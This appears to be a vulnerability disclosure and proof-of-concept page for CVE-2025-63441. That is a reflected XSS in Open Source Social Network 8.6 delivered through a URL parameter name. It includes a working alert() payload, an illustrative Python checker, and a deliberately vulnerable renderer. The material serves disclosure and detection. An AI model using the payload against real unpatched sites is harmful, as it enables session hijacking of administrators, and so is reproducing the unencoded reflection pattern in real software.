
CVE-2025-63441 PoC — Open Source Social Network security vulnerability

Source
Associated Vulnerability
Title: Open Source Social Network security vulnerability (CVE-2025-63441)
Description: Open Source Social Network (OSSN) 8.6 is vulnerable to Cross-Site Scripting (XSS) via the name of an arbitrarily supplied URL parameter at the endpoint u/administrator/friends.
Readme
# CVE-2025-63441

**Title:**
Reflected XSS via an arbitrarily supplied URL parameter name at endpoint `u/administrator/friends`

**Summary:**
A reflected Cross-Site Scripting (XSS) vulnerability was identified in the `u/administrator/friends` endpoint of the OSSN application.
The page reflects the *name* of any URL parameter it receives into the response without HTML-encoding it, so an attacker who lures a logged-in user (for example an administrator) to a crafted URL can execute script in that user's browser.

**Impact:**
- Perform virtual defacement of the web site.
- Carry out any action that the victim user is able to perform.
- Redirect the user to an attacker-controlled site.
- Capture the victim's (for example the administrator's) session cookie, if it is not flagged HttpOnly.

**Fixed in:** OSSN 8.7 and above
**GitHub issue:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2501

**PoC:**
Payload (appended to the endpoint URL): `?tcjz4'><script>alert(origin)<%2fscript>fefyj=1`
After URL decoding, the parameter name is `tcjz4'><script>alert(origin)</script>fefyj` and its value is `1`; the random tokens `tcjz4` and `fefyj` mark where the name is reflected in the response.
![PoC screenshot](https://github.com/user-attachments/assets/9843e99d-5623-47d7-ac68-1a21b2e70f8f)
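The following script is an added example, not part of the advisory or of the OSSN code base. It shows why the payload lives in the parameter *name*, reproduces the failure mode with a hypothetical page renderer that echoes parameter names unencoded beside a hardened renderer that HTML-encodes them, and classifies a response body as vulnerable or encoded by looking between the two random marker tokens. The two renderers and their HTML output are constructed for illustration; they are not OSSN's real templates.

```python
"""Offline check for reflected XSS through a URL parameter *name* (illustration).

The CVE-2025-63441 PoC puts the payload in the parameter name, not the value:
    ?tcjz4'><script>alert(origin)<%2fscript>fefyj=1
After URL decoding the name is  tcjz4'><script>alert(origin)</script>fefyj
and the value is 1. The renderers below are hypothetical stand-ins for the
affected page; their output is constructed, not captured from OSSN.
"""
import html
import re
from urllib.parse import parse_qsl

ENDPOINT = "/u/administrator/friends"  # endpoint named in the advisory
# Query string from the advisory's PoC, exactly as it appears after the "?".
POC_QUERY = "tcjz4'><script>alert(origin)<%2fscript>fefyj=1"


def decode_query(query: str) -> list[tuple[str, str]]:
    """URL-decode a query string into (name, value) pairs, as a server would.

    "%2f" becomes "/", so the whole "tcjz4'><script>...</script>fefyj"
    string is the parameter name and its value is just "1".
    """
    return parse_qsl(query, keep_blank_values=True)


# --- two hypothetical page renderers (illustration only; not OSSN code) ----

def render_vulnerable(query: str) -> str:
    """Re-emit every parameter name into the page without encoding.

    This is the failure mode the advisory describes: the attacker chooses
    the parameter name, so the markup boundary is under attacker control.
    """
    fields = "".join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in decode_query(query)
    )
    return f"<form action='{ENDPOINT}'>{fields}</form>"


def render_fixed(query: str) -> str:
    """Same page, but every reflected name and value is HTML-encoded first.

    html.escape(..., quote=True) encodes < > & " and ', the equivalent of
    PHP's htmlspecialchars(..., ENT_QUOTES) for an attribute context.
    """
    fields = "".join(
        '<input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(value, quote=True)
        )
        for name, value in decode_query(query)
    )
    return f"<form action='{ENDPOINT}'>{fields}</form>"


def classify_reflection(body: str, prefix: str = "tcjz4", suffix: str = "fefyj") -> str:
    """Locate the reflected parameter name between the two random markers.

    Returns "vulnerable" if any markup-breaking character (<, >, ') survives
    between the markers, "encoded" if the name is reflected but neutralised,
    and "not reflected" if the markers never appear in the body.
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "not reflected"
    between = m.group(1)
    return "vulnerable" if any(c in between for c in "<>'") else "encoded"


if __name__ == "__main__":
    print(decode_query(POC_QUERY))
    for label, page in (("vulnerable", render_vulnerable(POC_QUERY)),
                        ("fixed", render_fixed(POC_QUERY))):
        print(f"{label}: {classify_reflection(page)}  <- {page}")
```

Against a live target the same `classify_reflection` check can be run on the body returned for the PoC URL; a "vulnerable" result means the raw `<script>` sequence reached the page, while "encoded" is what a patched 8.7+ instance is expected to return.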



File Snapshot

/data/pocs/0913e802f3cef838e009ed37cf57c8240c522f25
└── README.md (920 bytes)
1 directory, 1 file